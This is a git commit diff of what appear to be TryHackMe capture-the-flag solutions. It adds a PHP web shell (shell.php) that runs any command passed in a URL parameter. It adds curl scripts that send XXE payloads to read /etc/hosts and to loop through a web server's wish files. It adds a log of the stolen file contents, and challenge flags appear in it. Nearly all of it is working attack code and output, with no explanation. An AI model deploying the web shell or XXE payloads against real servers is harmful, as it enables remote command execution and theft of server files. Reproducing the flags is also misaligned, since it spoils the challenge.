commit 8ffc4db7a82f973f636aec1f99e3c69875935797
Author: Sivert V. Sæther <git@sivert.pw>
Date:   Sun Dec 8 17:19:06 2024 +0100

    batman

diff --git a/1/somg.mp3 b/1/somg.mp3
new file mode 100644
index 0000000..f7facac
Binary files /dev/null and b/1/somg.mp3 differ
diff --git a/1/song.mp3 b/1/song.mp3
new file mode 100755
index 0000000..3782f4d
Binary files /dev/null and b/1/song.mp3 differ
diff --git a/3/shell.php b/3/shell.php
new file mode 100644
index 0000000..0415454
--- /dev/null
+++ b/3/shell.php
@@ -0,0 +1,22 @@
+<html>
+<style>
+body {
+ color: lime;
+ background-color: #333;
+}
+</style>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="text" name="command" autofocus id="command" size="50">
+<input type="submit" value="Execute">
+</form>
+<pre>
+<?php
+    if(isset($_GET['command'])) 
+    {
+        system($_GET['command'] . ' 2>&1'); 
+    }
+?>
+</pre>
+</body>
+</html>
diff --git a/5/CHANGELOG b/5/CHANGELOG
new file mode 100644
index 0000000..cadf4e1
--- /dev/null
+++ b/5/CHANGELOG
@@ -0,0 +1,23 @@
+commit 3f786850e387550fdab836ed7e6dc881de23001b (HEAD -> master, origin/master, origin/HEAD)
+Author: Mayor Malware - Wareville <mayor@wareville.org>
+Date:   Wed Dec 4 21:24:22 2024 +0200
+
+    Fixed the wishlist.php page THM{m4y0r_m4lw4r3_b4ckd00rs}
+
+commit 89e6c98d92887913cadf06b2adb97f26cde4849b (tag: v1.0.0)
+Author: Software - Wareville <software@wareville.org>
+Date:   Thu Dec 4 14:45:18 2024 +0200
+
+    Almost done with the wishlists page, needs to handle XML parsing
+
+commit 2b66fd261ee5c6cfc8de7fa466bab600bcfe4f69
+Author: Software - Wareville <software@wareville.org>
+Date:   Tue Dec 2 15:20:57 2024 +0200
+
+    Finally done with the landing page and initial CSS
+
+commit e983f374794de9c64e3d1c1de1d490c0756eeeff
+Author: Software - Wareville <software@wareville.org>
+Date:   Tue Dec 2 15:19:33 2024 +0200
+
+    Initial commit
diff --git a/5/trgt b/5/trgt
new file mode 100644
index 0000000..69b3679
--- /dev/null
+++ b/5/trgt
@@ -0,0 +1 @@
+10.10.148.114
diff --git a/5/wish.sh b/5/wish.sh
new file mode 100755
index 0000000..f8ee7fd
--- /dev/null
+++ b/5/wish.sh
@@ -0,0 +1,12 @@
+#!/bin/sh
+target=`cat trgt`
+curl -iH 'Content-Type: application/xml' "http://$target/wishlist.php" \
+ -d "<!--?xml version='1.0' ?-->
+<!DOCTYPE foo [<!ENTITY payload SYSTEM '/var/www/html/wishes/wish_1.txt'> ]>
+<wishlist>
+  <user_id>1</user_id>
+     <item>
+       <product_id>&payload;</product_id>
+     </item>
+</wishlist>"
+
diff --git a/5/wishes.log b/5/wishes.log
new file mode 100644
index 0000000..b1a0804
--- /dev/null
+++ b/5/wishes.log
@@ -0,0 +1,176 @@
+Trying wish_1.txt...
+The product ID: Wish #1
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_2.txt...
+The product ID: Wish #2
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_3.txt...
+The product ID: Wish #3
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_4.txt...
+The product ID: Wish #4
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_5.txt...
+The product ID: Wish #5
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_6.txt...
+The product ID: Wish #6
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_7.txt...
+The product ID: Wish #7
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_8.txt...
+The product ID: Wish #8
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_9.txt...
+The product ID: Wish #9
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_10.txt...
+The product ID: Wish #10
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_11.txt...
+The product ID: Wish #11
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_12.txt...
+The product ID: Wish #12
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_13.txt...
+The product ID: Wish #13
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_14.txt...
+The product ID: Wish #14
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_15.txt...
+The product ID: Wish #15
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+PS: The flag is THM{Brut3f0rc1n6_mY_w4y}
+is invalid.
+Trying wish_16.txt...
+The product ID: Wish #16
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_17.txt...
+The product ID: Wish #17
+Name: Mayor Malware
+Address: Test
+---------------------------------------
+Product: Waredy Cane
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_18.txt...
+The product ID: Wish #18
+Name: Test
+Address: Test
+---------------------------------------
+Product: Wareville's Jolly Cap
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_19.txt...
+The product ID: Wish #19
+Name: Test
+Address: TEst
+---------------------------------------
+Product: Teddy of the Ville
+Quantity: 1
+---------------------------------------
+is invalid.
+Trying wish_20.txt...
+The product ID: is invalid.
+Trying wish_21.txt...
+Failed to parse XML
diff --git a/5/wishes.sh b/5/wishes.sh
new file mode 100755
index 0000000..e687f72
--- /dev/null
+++ b/5/wishes.sh
@@ -0,0 +1,23 @@
+#!/bin/bash
+target=`cat trgt`
+opts="-sH 'Content-Type: application/xml'"
+declare -i i=1
+#i=20
+while [ $i -gt 0 ]; do
+	echo "Trying wish_$i.txt..."
+	p="<!--?xml version='1.0' ?-->
+<!DOCTYPE foo [<!ENTITY payload SYSTEM '/var/www/html/wishes/wish_$i.txt'> ]>
+<wishlist>
+  <user_id>1</user_id>
+     <item>
+       <product_id>&payload;</product_id>
+     </item>
+</wishlist>"
+	out=`curl $opts http://$target/wishlist.php -d "$p"`
+	echo "$out"
+	echo "$out" | grep -q 'Failed to parse XML'
+	[ $? -eq 0 ] && break;
+	sleep 1
+	i+=1
+done
+
diff --git a/5/wishlist.sh b/5/wishlist.sh
new file mode 100755
index 0000000..caab403
--- /dev/null
+++ b/5/wishlist.sh
@@ -0,0 +1,12 @@
+#!/bin/sh
+target=`cat trgt`
+curl -iH 'Content-Type: application/xml' "http://$target/wishlist.php" \
+ -d '<!--?xml version="1.0" ?-->
+<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
+<wishlist>
+  <user_id>1</user_id>
+     <item>
+       <product_id>&payload;</product_id>
+     </item>
+</wishlist>'
+